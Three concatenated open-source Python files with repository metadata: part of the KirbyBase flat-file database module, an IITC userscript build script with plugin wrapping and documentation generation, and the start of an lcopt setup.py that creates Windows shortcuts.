Translates encoded character strings back to special characters
like \n, \r, \032.
Keyword Arguments:
s - string to unencode.
Returns unencoded string.
'''
if self.unencodeRegExp.search(s):
s = s.replace('&linefeed;', '\n')
s = s.replace('&carriage_return;', '\r')
s = s.replace('&substitute;', '\032')
s = s.replace('&pipe;', '|')
return s
#----------------------------------------------------------------------
# _updateHeaderVars
#----------------------------------------------------------------------
def _updateHeaderVars(self, fptr):
# Go to the header record and read it in.
fptr.seek(0)
line = fptr.readline()
# Chop off the newline character.
line = line[0:-1]
# Split the record into fields.
header_rec = line.split('|')
# Update Last Record Number and Deleted Records counters.
self.last_recno = int(header_rec[0])
self.del_counter = int(header_rec[1])
# Skip the recno counter, and the delete counter.
header_fields = header_rec[2:]
# Create an instance variable holding the field names.
self.field_names = [item.split(':')[0] for item in header_fields]
# Create an instance variable holding the field types.
self.field_types = [self.strToTypes[x.split(':')[1]] for x in
header_fields]
# the functions to use to convert values as strings into their type
convTypes={int:int,float:float,bool:self._strToBool,
str:self._unencodeString,
datetime.date:self._strToDate,
datetime.datetime:self._strToDateTime}
self.convert_types_functions = [convTypes[f] for f in
self.field_types]
#----------------------------------------------------------------------
# _validateMatchCriteria
#----------------------------------------------------------------------
def _validateMatchCriteria(self, fields, patterns):
"""Run various checks against list of fields and patterns to be
used as search criteria. This method is called from all public
methods that search the database.
"""
if len(fields) == 0:
raise KBError('Length of fields list must be greater ' +
'than zero.')
if len(fields) != len(patterns):
raise KBError('Length of fields list and patterns list ' +
'not the same.')
# If any of the list of fields to search on do not match a field
# in the table, raise an error.
for field, pattern in zip(fields, patterns):
if field not in self.field_names:
raise KBError('Invalid field name in fields list: %s'
%field)
# If the field is recno, make sure they are trying not to
# search on more than one field. Also, make sure they are
# either trying to match all records or that it is an integer.
if field == 'recno':
if len(fields) > 1:
raise KBError('If selecting by recno, no other ' +
'selection criteria is allowed')
if pattern != '*':
# check if all specified recnos are integers
if not isinstance(pattern,(tuple,list)):
pattern = [pattern]
for x in pattern:
if not isinstance(x,int):
raise KBError('Recno argument %s has type %s'
', expected an integer' %(x,type(x)))
continue
# If the field type is not a str or a bool, make sure the
# pattern you are searching on has a proper comparion
# operator (<,<=,>,>=,==,!=,or <>) in it.
if (self.field_types[self.field_names.index(field)] in
[int, float, datetime.date, datetime.datetime]):
r = re.search('[\s]*[\+-]?\d', pattern)
if not self.cmpFuncs.has_key(pattern[:r.start()]):
raise KBError('Invalid comparison syntax: %s'
% pattern[:r.start()])
#----------------------------------------------------------------------
#_convertInput
#----------------------------------------------------------------------
def _convertInput(self, values):
"""If values is a dictionary or an object, we are going to convert
it into a list. That way, we can use the same validation and
updating routines regardless of whether the user passed in a
dictionary, an object, or a list.
"""
# If values is a list, make a copy of it.
if isinstance(values, list): record = list(values)
# If values is a dictionary, convert it's values into a list
# corresponding to the table's field names. If there is not
# a key in the dictionary corresponding to a field name, place a
# '' in the list for that field name's value.
elif isinstance(values, dict):
record = [values.get(k,'') for k in self.field_names[1:]]
# If values is a record object, then do the same thing for it as
# you would do for a dictionary above.
else:
record = [getattr(values,a,'') for a in self.field_names[1:]]
# Return the new list with all items == None replaced by ''.
new_rec = []
for r in record:
if r == None:
new_rec.append('')
else:
new_rec.append(r)
return new_rec
#----------------------------------------------------------------------
# _validateUpdateCriteria
#----------------------------------------------------------------------
def _validateUpdateCriteria(self, updates, filter):
"""Run various checks against list of updates and fields to be
used as update criteria. This method is called from all public
methods that update the database.
"""
if len(updates) == 0:
raise KBError('Length of updates list must be greater ' +
'than zero.')
if len(updates) != len(filter):
raise KBError('Length of updates list and filter list ' +
'not the same.')
# Since recno is the record's primary key and is system
# generated, like an autoincrement field, do not allow user
# to update it.
if 'recno' in filter:
raise KBError("Cannot update value of 'recno' field.")
# Validate filter list.
self._validateFilter(filter)
# Make sure each update is of the proper type.
for update, field_name in zip(updates, filter):
if update in ['', None]: pass
elif type(update) != self.field_types[
self.field_names.index(field_name)]:
raise KBError("Invalid update value for %s" % field_name)
#----------------------------------------------------------------------
# _validateFilter
#----------------------------------------------------------------------
def _validateFilter(self, filter):
# Each field in the filter list must be a valid field in the table.
for field in filter:
if field not in self.field_names:
raise KBError('Invalid field name: %s' % field)
#----------------------------------------------------------------------
# _getMatches
#----------------------------------------------------------------------
def _getMatches(self, fptr, fields, patterns, useRegExp):
# Initialize a list to hold all records that match the search
# criteria.
match_list = []
# If one of the fields to search on is 'recno', which is the
# table's primary key, then search just on that field and return
# at most one record.
if 'recno' in fields:
return self._getMatchByRecno(fptr,patterns)
# Otherwise, search table, using all search fields and patterns
# specified in arguments lists.
else:
new_patterns = []
fieldNrs = [self.field_names.index(x) for x in fields]
for fieldPos, pattern in zip(fieldNrs, patterns):
if self.field_types[fieldPos] == str:
# If useRegExp is True, compile the pattern to a
# regular expression object and add it to the
# new_patterns list. Otherwise, just add it to
# the new_patterns list. This will be used below
# when matching table records against the patterns.
if useRegExp:
new_patterns.append(re.compile(pattern))
# the pattern can be a tuple with re flags like re.I
else:
new_patterns.append(pattern)
elif self.field_types[fieldPos] == bool:
# If type is boolean, I am going to coerce it to be
# either True or False by applying bool to it. This
# is because it could be '' or []. Next, I am going
# to convert it to the string representation: either
# 'True' or 'False'. The reason I do this is because
# that is how it is stored in each record of the table
# and it is a lot faster to change this one value from
# boolean to string than to change possibly thousands
# of table values from string to boolean. And, if they
# both are either 'True' or 'False' I can still
# compare them using the equality test and get the same
# result as if they were both booleans.
new_patterns.append(str(bool(pattern)))
else:
# If type is int, float, date, or datetime, this next
# bit of code will split the the comparison string
# into the string representing the comparison
# operator (i.e. ">=" and the actual value we are going
# to compare the table records against from the input
# pattern, (i.e. "5"). So, for example, ">5" would be
# split into ">" and "5".
r = re.search('[\s]*[\+-]?\d', pattern)
if self.field_types[fieldPos] == int:
patternValue = int(pattern[r.start():])
elif self.field_types[fieldPos] == float:
patternValue = float(pattern[r.start():])
else:
patternValue = pattern[r.start():]
new_patterns.append(
[self.cmpFuncs[pattern[:r.start()]], patternValue]
)
fieldPos_new_patterns = zip(fieldNrs, new_patterns)
maxfield = max(fieldNrs)+1
# Record current position in table. Then read first detail
# record.
fpos = fptr.tell()
line = fptr.readline()
# Loop through entire table.
while line:
# Strip off newline character and any trailing spaces.
line = line[:-1].strip()
try:
# If blank line, skip this record.
if line == "": raise KBnomatch('No Match : blank line')
# Split the line up into fields.
record = line.split("|", maxfield)
# Foreach correspond field and pattern, check to see
# if the table record's field matches successfully.
for fieldPos, pattern in fieldPos_new_patterns:
# If the field type is string, it
# must be an exact match or a regular expression,
# so we will compare the table record's field to it
# using either '==' or the regular expression
# engine. Since it is a string field, we will need
# to run it through the unencodeString function to
# change any special characters back to their
# original values.
if self.field_types[fieldPos] == str:
try:
if useRegExp:
if not pattern.search(
self._unencodeString(record[fieldPos])
):
raise KBnomatch('No Match : line 1744')
else:
if record[fieldPos] != pattern:
raise KBnomatch('No Match : line 1747')
except KBnomatch:
raise # we raise the same KBnomatch again
except Exception:
raise KBError(
'Invalid match expression for %s'
% self.field_names[fieldPos])
# If the field type is boolean, then I will simply
# do an equality comparison. See comments above
# about why I am actually doing a string compare
# here rather than a boolean compare.
elif self.field_types[fieldPos] == bool:
if record[fieldPos] != pattern:
raise KBnomatch('No Match : boolean')
# If it is not a string or a boolean, then it must
# be a number or a date.
else:
# Convert the table's field value, which is a
# string, back into it's native type so that
# we can do the comparison.
if record[fieldPos] == '':
tableValue = None
elif self.field_types[fieldPos] == int:
tableValue = int(record[fieldPos])
elif self.field_types[fieldPos] == float:
tableValue = float(record[fieldPos])
# I don't convert datetime values from strings
# back into their native types because it is
# faster to just leave them as strings and
# convert the comparison value that the user
# supplied into a string. Comparing the two
# strings works out the same as comparing two
# datetime values anyway.
elif self.field_types[fieldPos] in (
datetime.date, datetime.datetime):
tableValue = record[fieldPos]
else:
# If it falls through to here, then,
# somehow, a bad field type got put into
# the table and we show an error.
raise KBError('Invalid field type for %s'
% self.field_names[fieldPos])
# Now we do the actual comparison. I used to
# just do an eval against the pattern string
# here, but I found that eval's are VERY slow.
# So, now I determine what type of comparison
# they are trying to do and I do it directly.
# This sped up queries by 40%.
if not pattern[0](tableValue, pattern[1]):
raise KBnomatch('No Match : line 1796')
# If a 'No Match' exception was raised, then go to the
# next record, otherwise, add it to the list of matches.
except KBnomatch:
pass
else:
match_list.append([line, fpos])
# Save the file position BEFORE we read the next record,
# because after a read it is pointing at the END of the
# current record, which, of course, is also the BEGINNING
# of the next record. That's why we have to save the
# position BEFORE we read the next record.
fpos = fptr.tell()
line = fptr.readline()
# After searching, return the list of matched records.
return match_list
#----------------------------------------------------------------------
# _getMatchByRecno
#----------------------------------------------------------------------
def _getMatchByRecno(self, fptr, recnos):
"""Search by recnos. recnos is a list, containing '*', an integer, or
a list or tuple of integers"""
# Initialize table location marker and read in first record
# of table.
fpos = fptr.tell()
line = fptr.readline()
if recnos == ['*']:
# take all the non blank lines
while line:
# Strip of newline character.
line = line[0:-1]
if line.strip():
yield [line,fpos]
fpos = fptr.tell()
line = fptr.readline()
else:
# select the records with record number in recnos
if isinstance(recnos[0],(tuple,list)):
# must make it a list, to be able to remove items
recnos = list(recnos[0])
while line:
# Strip of newline character.
line = line[0:-1]
# If line is not blank, split it up into fields.
if line.strip():
record = line.split("|")
# If record number for current record equals record number
# we are searching for, add it to match list
if int(record[0]) in recnos:
yield [line, fpos]
recnos.remove(int(record[0]))
# if no more recno to search, stop looping
if not recnos: break
# update the table location marker
# and read the next record.
fpos = fptr.tell()
line = fptr.readline()
# Stop iteration
return
#----------------------------------------------------------------------
# _incrRecnoCounter
#----------------------------------------------------------------------
def _incrRecnoCounter(self, fptr):
# Save where we are in the table.
last_pos = fptr.tell()
# Go to header record and grab header fields.
fptr.seek(0)
line = fptr.readline()
header_rec = line[0:-1].split('|')
# Increment the recno counter.
self.last_recno += 1
header_rec[0] = "%06d" %(self.last_recno)
# Write the header record back to the file. Run each field through
# encoder to handle special characters.
self._writeRecord(fptr, 0, '|'.join(header_rec))
# Go back to where you were in the table.
fptr.seek(last_pos)
# Return the newly incremented recno counter.
return self.last_recno
#----------------------------------------------------------------------
# _incrDeleteCounter
#----------------------------------------------------------------------
def _incrDeleteCounter(self, fptr):
# Save where we are in the table.
last_pos = fptr.tell()
# Go to header record and grab header fields.
fptr.seek(0)
line = fptr.readline()
header_rec = line[0:-1].split('|')
# Increment the delete counter.
self.del_counter += 1
header_rec[1] = "%06d" %(self.del_counter)
# Write the header record back to the file.
self._writeRecord(fptr, 0, '|'.join(header_rec))
# Go back to where you were in the table.
fptr.seek(last_pos)
#----------------------------------------------------------------------
# _deleteRecord
#----------------------------------------------------------------------
def _deleteRecord(self, fptr, pos, record):
# Move to record position in table.
fptr.seek(pos)
# Overwrite record with all spaces.
self._writeRecord(fptr, pos, " " * len(record))
#----------------------------------------------------------------------
# _writeRecord
#----------------------------------------------------------------------
def _writeRecord(self, fptr, pos, record):
try:
# If record is to be appended, go to end of table and write
# record, adding newline character.
if pos == 'end':
fptr.seek(0, 2)
fptr.write(record + '\n')
else:
# Otherwise, move to record position in table and write
# record.
fptr.seek(pos)
fptr.write(record)
except:
raise KBError('Could not write record to: ' + fptr.name)
#----------------------------------------------------------------------
# _openTable
#----------------------------------------------------------------------
def _openTable(self, name, access):
try:
# Open physical file holding table.
fptr = open(name, access)
except:
raise KBError('Could not open table: ' + name)
# Return handle to physical file.
return fptr
#----------------------------------------------------------------------
# _closeTable
#----------------------------------------------------------------------
def _closeTable(self, fptr):
try:
# Close the file containing the table.
fptr.close()
except:
raise KBError('Could not close table: ' + fptr.name)
#----------------------------------------------------------------------
# _sendSocket
#----------------------------------------------------------------------
def _sendSocket(self, command):
dbSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dbSock.connect((self.host, self.port))
self.dbSock = dbSock
# Send the length of the command followed by the command itself.
dbSock.send('%16s%s' % (len(command), command))
# Receive the return value of the method.
data = ''
while len(data) < 16:
data = data + dbSock.recv(1024)
recv_length = int(data[:16])
data = data[16:]
while len(data) < recv_length:
data = data + dbSock.recv(1024)
# Convert pickled binary data back into it's original format
# (usually a list).
data = cPickle.loads(data[:recv_length])
# If the server passed back an error object, re-raise that error
# here on the client side, otherwise, just return the data to the
# caller.
if isinstance(data, Exception):
raise data
else:
return data
#--------------------------------------------------------------------------
# Generic class for records
#--------------------------------------------------------------------------
class Record(object):
"""Generic class for record objects.
Public Methods:
__init__ - Create an instance of Record.
"""
#----------------------------------------------------------------------
# init
#----------------------------------------------------------------------
def __init__(self,names,values):
self.__dict__ = dict(zip(names, values))
#--------------------------------------------------------------------------
# KBError Class
#--------------------------------------------------------------------------
class KBError(Exception):
"""Exception class for Database Management System.
Public Methods:
__init__ - Create an instance of exception.
"""
#----------------------------------------------------------------------
# init
#----------------------------------------------------------------------
def __init__(self, value):
self.value = value
def __str__(self):
return `self.value`
# I overrode repr so I could pass error objects from the server to the
# client across the network.
def __repr__(self):
format = """KBError("%s")"""
return format % (self.value)
#--------------------------------------------------------------------------
# KBnomatch Class
# Added to avoid those string exceptions that are to be domoted.
#--------------------------------------------------------------------------
class KBnomatch(Exception):
"""Exception class for Database Management System.
Public Methods:
__init__ - Create an instance of exception.
"""
def __init__(self, value):
self.value = value
#print self.value
def __str__(self):
return `self.value`
# Don't know if I need this, but anyway.
def __repr__(self):
format = """KBnomatch("%s")"""
return format % (self.value)
| COSMOGRAIL/COSMOULINE | pipe/modules/kirbybase.py | Python | gpl-3.0 | 92,500 |
#!/usr/bin/env python
# Modification History
# 01/28/2017 Add jsdoc2md and some print statements to trace what's going on. Brian S Hayes (Hayeswise)
# 02/04/2017 Add if exists check around distribution file rather than use try block. Brian S Hayes (Hayeswise)
import glob
import time
import re
import io
import base64
import sys
import os
import shutil
import json
import shelve
import hashlib
import subprocess
import time
from datetime import datetime
#try:
# import jsmin
#except ImportError:
# print ("Not able to import jsmin")
try:
import urllib2
except ImportError:
import urllib.request as urllib2
# load settings file
from buildsettings import buildSettings
# load option local settings file
try:
from localbuildsettings import buildSettings as localBuildSettings
buildSettings.update(localBuildSettings)
except ImportError:
pass
# load default build
try:
from localbuildsettings import defaultBuild
except ImportError:
defaultBuild = None
buildName = defaultBuild
clean = False
verbose = False
# build name from command line
if len(sys.argv) >= 2: # argv[0] = program, argv[1] = buildname, len=2
buildName = sys.argv[1]
if len(sys.argv) >= 3: # argv[0] = program, argv[1] = buildname, option
for option in sys.argv:
if option == "-verbose" or option == "--verbose":
verbose = True;
if option == "-clean" or option == "--clean":
clean = True;
if buildName is None or not buildName in buildSettings:
print ("Usage: build.py buildname [--verbose] [--clean]")
print (" available build names: %s" % ', '.join(buildSettings.keys()))
print (" if --clean, the files will not be built.")
sys.exit(1)
# set up vars used for replacements
utcTime = time.gmtime()
buildDate = time.strftime('%Y-%m-%d-%H%M%S',utcTime)
# userscripts have specific specifications for version numbers - the above date format doesn't match
dateTimeVersion = time.strftime('%Y%m%d.',utcTime) + time.strftime('%H%M%S',utcTime).lstrip('0')
verbose and print("IITC build, dateTimeVersion=" + dateTimeVersion + ", buildDate=" + buildDate)
verbose and print ("Get buildSettings[" + buildName + "]")
if buildName in buildSettings:
settings = buildSettings[buildName]
# extract required values from the settings entry
resourceUrlBase = settings.get('resourceUrlBase')
distUrlBase = settings.get('distUrlBase')
buildMobile = settings.get('buildMobile')
antOptions = settings.get('antOptions','')
antBuildFile = settings.get('antBuildFile', 'mobile/build.xml');
# plugin wrapper code snippets. handled as macros, to ensure that
# 1. indentation caused by the "function wrapper()" doesn't apply to the plugin code body
# 2. the wrapper is formatted correctly for removal by the IITC Mobile android app
pluginWrapperStart = """
function wrapper(plugin_info) {
// ensure plugin framework is there, even if iitc is not yet loaded
if(typeof window.plugin !== 'function') window.plugin = function() {};
//PLUGIN AUTHORS: writing a plugin outside of the IITC build environment? if so, delete these lines!!
//(leaving them in place might break the 'About IITC' page or break update checks)
plugin_info.buildName = '@@BUILDNAME@@';
plugin_info.dateTimeVersion = '@@DATETIMEVERSION@@';
plugin_info.pluginId = '@@PLUGINNAME@@';
//END PLUGIN AUTHORS NOTE
"""
pluginWrapperStartUseStrict = pluginWrapperStart.replace("{\n", "{\n\"use strict\";", 1).replace("function", ";function", 1)
pluginWrapperEnd = """
setup.info = plugin_info; //add the script info data to the function as a property
if(!window.bootPlugins) window.bootPlugins = [];
window.bootPlugins.push(setup);
// if IITC has already booted, immediately run the 'setup' function
if(window.iitcLoaded && typeof setup === 'function') setup();
} // wrapper end
// inject code into site context
var script = document.createElement('script');
var info = {};
if (typeof GM_info !== 'undefined' && GM_info && GM_info.script) info.script = {version: GM_info.script.version, name: GM_info.script.name, description: GM_info.script.description };
script.appendChild(document.createTextNode('('+ wrapper +')('+JSON.stringify(info)+');'));
(document.body || document.head || document.documentElement).appendChild(script);
"""
def lastModText(datetimestamp):
return "does not exist." if datetimestamp == 0 else ("was last modified on " + (str(datetime.fromtimestamp(datetimestamp))))
def readfile(fn):
with io.open(fn, 'Ur', encoding='utf8') as f:
return f.read()
def loaderString(var):
fn = var.group(1)
return readfile(fn).replace('\n', '\\n').replace('\'', '\\\'')
def loaderRaw(var):
fn = var.group(1)
return readfile(fn)
def loaderMD(var):
fn = var.group(1)
# use different MD.dat's for python 2 vs 3 incase user switches versions, as they are not compatible
db = shelve.open('build/MDv' + str(sys.version_info[0]) + '.dat')
if 'files' in db:
files = db['files']
else:
files = {}
file = readfile(fn)
filemd5 = hashlib.md5(file.encode('utf8')).hexdigest()
# check if file has already been parsed by the github api
if fn in files and filemd5 in files[fn]:
# use the stored copy if nothing has changed to avoid hitting the api more then the 60/hour when not signed in
db.close()
return files[fn][filemd5]
else:
url = 'https://api.github.com/markdown'
payload = {'text': file, 'mode': 'markdown'}
headers = {'Content-Type': 'application/json'}
req = urllib2.Request(url, json.dumps(payload).encode('utf8'), headers)
md = urllib2.urlopen(req).read().decode('utf8').replace('\n', '\\n').replace('\'', '\\\'')
files[fn] = {}
files[fn][filemd5] = md
db['files'] = files
db.close()
return md
def loaderImage(var):
fn = var.group(1)
return 'data:image/png;base64,{0}'.format(base64.encodestring(open(fn, 'rb').read()).decode('utf8').replace('\n', ''))
def loadCode(ignore):
return '\n\n;\n\n'.join(map(readfile, sorted(glob.glob('code/*.js'))))
def extractUserScriptMeta(var):
m = re.search ( r"//[ \t]*==UserScript==\n.*?//[ \t]*==/UserScript==\n", var, re.MULTILINE|re.DOTALL )
return m.group(0)
def latestDependencyModTime(script):
# TODO add something for INJECTCODE
patterns = ['@@INCLUDERAW:([0-9a-zA-Z_./-]+)@@', '@@INCLUDESTRING:([0-9a-zA-Z_./-]+)@@', '@@INCLUDEMD:([0-9a-zA-Z_./-]+)@@' '@@INCLUDEIMAGE:([0-9a-zA-Z_./-]+)@@']
groupLastModDate = 0
for pattern in patterns:
files = re.findall(pattern,script)
for file in files:
lastModDate = os.path.getmtime(file)
verbose and print (" dependency " + file + " " + lastModText(lastModDate))
if lastModDate > groupLastModDate:
groupLastModDate = lastModDate
return groupLastModDate
def doReplacements(script,updateUrl,downloadUrl,pluginName=None):
script = re.sub('@@INJECTCODE@@',loadCode,script)
script = script.replace('@@PLUGINSTART@@', pluginWrapperStart)
script = script.replace('@@PLUGINSTART-USE-STRICT@@', pluginWrapperStartUseStrict)
script = script.replace('@@PLUGINEND@@', pluginWrapperEnd)
script = re.sub('@@INCLUDERAW:([0-9a-zA-Z_./-]+)@@', loaderRaw, script)
script = re.sub('@@INCLUDESTRING:([0-9a-zA-Z_./-]+)@@', loaderString, script)
script = re.sub('@@INCLUDEMD:([0-9a-zA-Z_./-]+)@@', loaderMD, script)
script = re.sub('@@INCLUDEIMAGE:([0-9a-zA-Z_./-]+)@@', loaderImage, script)
script = script.replace('@@BUILDDATE@@', buildDate)
script = script.replace('@@DATETIMEVERSION@@', dateTimeVersion)
if resourceUrlBase:
script = script.replace('@@RESOURCEURLBASE@@', resourceUrlBase)
else:
if '@@RESOURCEURLBASE@@' in script:
raise Exception("Error: '@@RESOURCEURLBASE@@' found in script, but no replacement defined")
script = script.replace('@@BUILDNAME@@', buildName)
script = script.replace('@@UPDATEURL@@', updateUrl)
script = script.replace('@@DOWNLOADURL@@', downloadUrl)
if (pluginName):
script = script.replace('@@PLUGINNAME@@', pluginName);
return script
def saveScriptAndMeta(script,ourDir,filename):
fn = os.path.join(outDir,filename)
with io.open(fn, 'w', encoding='utf8') as f:
f.write(script)
metafn = fn.replace('.user.js', '.meta.js')
if metafn != fn:
with io.open(metafn, 'w', encoding='utf8') as f:
meta = extractUserScriptMeta(script)
f.write(meta)
# Set directory values and create directories if missing
cwd = os.getcwd()
buildRoot = os.path.join(cwd, 'build')
docRoot = os.path.join(cwd, "docs")
distRoot = os.path.join(cwd, 'dist')
outDir = os.path.join(buildRoot, buildName)
if clean:
verbose and print ("Cleaning directories")
for d in [outDir, distRoot]: #docRoot TODO: need to handle images
if os.path.exists(d):
verbose and print(" " + d)
for d, dirs, files in os.walk(d): # Thanks to rejax at http://stackoverflow.com/questions/36267807/python-recursively-remove-files-folders-in-a-directory-but-not-the-parent-direc
for name in files:
try:
os.remove(os.path.join(d,name))
except:
print(" Error:", sys.exec_info()[0])
for name in dirs:
try:
shutil.rmtree(os.path.join(d,name))
except:
print(" Error:", sys.exec_info()[0])
for d, dirs, files in os.walk(buildRoot):
for name in files:
try:
os.remove(os.path.join(d,name))
except:
print(" Error:", sys.exec_info()[0])
sys.exit(1);
if not os.path.exists(buildRoot):
os.mkdir(buildRoot)
if not os.path.exists(outDir):
os.mkdir(outDir)
if not os.path.exists(distRoot):
os.mkdir(distRoot)
if not os.path.isdir(docRoot):
os.mkdir(os.path.join(cwd, "docs"))
# see if jsdoc2md is installed for JSDoc
jsdoc2md = shutil.which("jsdoc2md")
jsdocFiles = []
# run any preBuild commands
for cmd in settings.get('preBuild',[]):
os.system ( cmd )
# load main.js, parse, and create main total-conversion-build.user.js
main = readfile('main.js')
downloadUrl = distUrlBase and distUrlBase + '/total-conversion-build.user.js' or 'none'
updateUrl = distUrlBase and distUrlBase + '/total-conversion-build.meta.js' or 'none'
# TODO: Only rebuild if main or one of the dependencies has changed per file last modified date
main = doReplacements(main,downloadUrl=downloadUrl,updateUrl=updateUrl)
saveScriptAndMeta(main, outDir, 'total-conversion-build.user.js')
shutil.copy2(os.path.join(outDir, 'total-conversion-build.user.js'), distRoot)
with io.open(os.path.join(outDir, '.build-timestamp'), 'w') as f:
f.write(u"" + time.strftime('%Y-%m-%d %H:%M:%S UTC', utcTime))
# for each plugin, load, parse, and save output
pluginsBuildRoot = os.path.join(outDir,'plugins')
if not os.path.exists(pluginsBuildRoot):
os.mkdir(pluginsBuildRoot)
verbose and print ("Build plugins and generate individual JSDocs")
fileIndex = 0
for fn in glob.glob("plugins/*.user.js"):
verbose and print("Processing plugin[" + str(fileIndex) + "] " + fn)
srcModTime = os.path.getmtime(fn) # Just note that the replacement strategy obfusactes file modification dates
buildPath = os.path.join(outDir, fn)
distPath = os.path.join(distRoot, fn)
distDir = os.path.dirname(distPath)
docPath = os.path.join(docRoot, fn.replace(".js",".md"))
docDir = os.path.dirname(docPath)
verbose and print(" buildPath is " + buildPath)
verbose and print(" distPath is " + distPath)
distFileModTime = os.path.getmtime(distPath) if os.path.exists(distPath) else 0
buildFileModTime = os.path.getmtime(buildPath) if os.path.exists(buildPath) else 0
script = readfile(fn)
dependencyModTime = latestDependencyModTime(script)
verbose and print (" " + fn + " " + lastModText(srcModTime) + ", last modified dependency on "
+ lastModText(dependencyModTime) + ", build version " + lastModText(buildFileModTime))
if (srcModTime > buildFileModTime or dependencyModTime > buildFileModTime):
downloadUrl = distUrlBase and distUrlBase + '/' + fn.replace("\\","/") or 'none'
updateUrl = distUrlBase and downloadUrl.replace('.user.js', '.meta.js') or 'none'
pluginName = os.path.splitext(os.path.splitext(os.path.basename(fn))[0])[0]
script = doReplacements(script, downloadUrl=downloadUrl, updateUrl=updateUrl, pluginName=pluginName)
saveScriptAndMeta(script, outDir, fn) # TODO: consider passing n buildPath
if not os.path.exists(distDir):
verbose and print(" os.path.makedirs(" + distDir + ")")
os.makedirs(distDir)
shutil.copy2(buildPath, distPath)
#shutil.copy2(buildPath.replace('.user.js', '.meta.js'), distPath.replace('.user.js', '.meta.js'))
#jsdocFiles.append(os.path.join(cwd,os.path.join(outDir,fn)))
else:
verbose and print (" no need to build since distribution is older than dependencies")
if jsdoc2md != None:
possibleJSDoc = re.search("/\*\*[ \t\n\r]{1}",script, re.MULTILINE)
buildFileModTime = os.path.getmtime(buildPath) if os.path.exists(buildPath) else 0;
docFileModTime = os.path.getmtime(docPath) if os.path.exists(docPath) else 0;
if (possibleJSDoc != None and (buildFileModTime > docFileModTime)): # this approach allows doc to be created outside this build.py
if not os.path.exists(docDir):
verbose and print(" os.path.makedirs(" + docDir + ")")
os.makedirs(docDir)
#docCmd = jsdoc2md + " " + os.path.join(cwd,os.path.join(outDir,fn)) + " > " + os.path.join(cwd,os.path.join("docs", os.path.basename(fn).replace(".js",".md")))
docCmd = jsdoc2md + " " + buildPath + " > " + docPath
verbose and print (" " + docCmd)
subprocess.call(docCmd)
fileIndex = fileIndex + 1
# jsdoc2md non user files
fileIndex = 0
others = [fn for fn in glob.glob("plugins/*.js") if not ".user." in fn]
for fn in others:
verbose and print("Processing others[" + str(fileIndex) + "] " + fn)
docPath = os.path.join(docRoot, fn.replace(".js",".md"))
docDir = os.path.dirname(docPath)
script = readfile(fn)
if jsdoc2md != None:
possibleJSDoc = re.search("/\*\*[ \t\n\r]{1}",script, re.MULTILINE)
srcModTime = os.path.getmtime(fn);
docFileModTime = os.path.getmtime(docPath) if os.path.exists(docPath) else 0;
if ((possibleJSDoc != None) and (srcModTime > docFileModTime)):
if not os.path.exists(docDir):
verbose and print("...os.path.makedirs(" + docDir + ")")
os.makedirs(docDir)
#docCmd = jsdoc2md + " " + os.path.join(cwd,os.path.join(outDir,fn)) + " > " + os.path.join(cwd,os.path.join("docs", os.path.basename(fn).replace(".js",".md")))
docCmd = jsdoc2md + " " + fn + " > " + docPath
verbose and print ("..." + docCmd)
subprocess.call(docCmd)
fileIndex = fileIndex + 1
# if we're building mobile too
if buildMobile:
verbose and print ("Build mobile")
if buildMobile not in ['debug','release','copyonly']:
raise Exception("Error: buildMobile must be 'debug' or 'release' or 'copyonly'")
# compile the user location script
fn = "user-location.user.js"
script = readfile("mobile/plugins/" + fn)
downloadUrl = distUrlBase and distUrlBase + '/' + fn.replace("\\","/") or 'none'
updateUrl = distUrlBase and downloadUrl.replace('.user.js', '.meta.js') or 'none'
script = doReplacements(script, downloadUrl=downloadUrl, updateUrl=updateUrl, pluginName='user-location')
saveScriptAndMeta(script, outDir, fn)
# copy the IITC script into the mobile folder. create the folder if needed
try:
os.makedirs("mobile/assets")
except:
pass
shutil.copy(os.path.join(outDir,"total-conversion-build.user.js"), "mobile/assets/total-conversion-build.user.js")
# copy the user location script into the mobile folder.
shutil.copy(os.path.join(outDir,"user-location.user.js"), "mobile/assets/user-location.user.js")
# also copy plugins
try:
shutil.rmtree("mobile/assets/plugins")
except:
pass
shutil.copytree(os.path.join(outDir,"plugins"), "mobile/assets/plugins",
# do not include desktop-only plugins to mobile assets
ignore=shutil.ignore_patterns('*.meta.js',
'force-https*', 'speech-search*', 'basemap-cloudmade*',
'scroll-wheel-zoom-disable*'))
if buildMobile != 'copyonly':
# now launch 'ant' to build the mobile project
retcode = os.system("ant %s -buildfile %s %s" % (antOptions, antBuildFile, buildMobile))
if retcode != 0:
print ("Error: mobile app failed to build. ant returned %d" % retcode)
exit(1) # ant may return 256, but python seems to allow only values <256
else:
shutil.copy("mobile/bin/IITC_Mobile-%s.apk" % buildMobile, os.path.join(outDir,"IITC_Mobile-%s.apk" % buildMobile) )
# run any postBuild commands
for cmd in settings.get('postBuild',[]):
os.system ( cmd )
verbose and print("Done, dateTimeVersion=" + dateTimeVersion + ", buildDate=" + buildDate)
# vim: ai si ts=4 sw=4 sts=4 et
| hayeswise/ingress-intel-total-conversion | wise-build.py | Python | isc | 17,501 |
'''
To create the wheel run - python setup.py bdist_wheel
'''
from setuptools import setup
import os, sys
packages = []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('lcopt'):
# Ignore dirnames that start with '.'
if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
def package_files(directory):
paths = []
for (path, directories, filenames) in os.walk(directory):
for filename in filenames:
paths.append(os.path.join('..', path, filename))
return paths
my_package_files = []
my_package_files.extend(package_files(os.path.join('lcopt', 'assets')))
my_package_files.extend(package_files(os.path.join('lcopt', 'static')))
my_package_files.extend(package_files(os.path.join('lcopt', 'templates')))
my_package_files.extend(package_files(os.path.join('lcopt', 'bin')))
def create_win_shortcuts():
try:
import winreg, sysconfig
from win32com.client import Dispatch
except:
return 1
def get_reg(name,path):
# Read variable from Windows Registry
# From https://stackoverflow.com/a/35286642
try:
registry_key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path, 0,
winreg.KEY_READ)
value, regtype = winreg.QueryValueEx(registry_key, name)
winreg.CloseKey(registry_key)
return value
except WindowsError:
return None
def create_shortcut(where, script_name, icon=None):
scriptsDir = sysconfig.get_path('scripts')
target = os.path.join(scriptsDir, script_name + '.exe')
link_name = script_name + '.lnk'
link = os.path.join(where, link_name)
if icon is None:
icon = target
if not os.path.isdir(where):
os.mkdir(where)
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(link)
shortcut.Targetpath = target
shortcut.WorkingDirectory = scriptsDir
